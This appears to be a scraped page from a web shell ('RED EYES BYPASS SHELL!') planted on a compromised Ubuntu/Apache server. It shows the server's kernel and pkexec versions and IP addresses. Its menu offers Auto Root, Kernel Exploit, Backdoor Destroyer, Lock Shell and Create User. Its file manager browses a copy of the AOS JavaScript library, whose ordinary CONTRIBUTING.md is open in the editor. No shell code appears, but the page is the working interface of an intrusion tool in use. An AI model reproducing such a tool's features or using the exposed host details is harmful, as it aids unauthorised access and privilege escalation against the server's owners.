Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
aos /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
demo
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.babelrc
70
B
-rwxr-xr-x
.editorconfig
208
B
-rwxr-xr-x
.gitattributes
222
B
-rwxr-xr-x
.gitignore
290
B
-rwxr-xr-x
.travis.yml
309
B
-rwxr-xr-x
CHANGELOG.md
1.41
KB
-rwxr-xr-x
CONTRIBUTING.md
1.23
KB
-rwxr-xr-x
LICENSE
1.06
KB
-rwxr-xr-x
README.md
9.74
KB
-rwxr-xr-x
bower.json
629
B
-rwxr-xr-x
karma.conf.js
1.3
KB
-rwxr-xr-x
package.json
1.49
KB
-rwxr-xr-x
postcss.config.js
66
B
-rwxr-xr-x
webpack.config.js
725
B
-rwxr-xr-x
yarn.lock
190.58
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
# Contributing to AOS ## Bugs Found a bug? Have a problem with AOS? Please check past issues, maybe someone already had that problem. If you don't find similar issue create new, but remember to add accurate informations so that I can dig into it straight away. If it's possible add CodePen example that presents called issue. ## Development process AOS is built using webpack. ### Setup - Install all dependencies: ``` npm install ``` - Run dev server: ``` npm run dev ``` This will run local webpack-dev-server and build AOS automatically. - Open browser and head to: [http://localhost:8080/webpack-dev-server/](http://localhost:8080/webpack-dev-server/) Server loads content from `demo` folder. Now you are ready to play with AOS. Browser should reload automatically as you change code in `src` folder. ### Testing Before you create Pull Request make sure all tests are passing. In order to do so run: ``` npm test ``` ### Commiting changes If all tests are passing then you're good to go. Commit your changes, but remember to **not commit `dist` folder**. Create well described Pull Request with as many informations as possible and wait for my answer :) I'd be happy to make a code review and put some thougths.
Close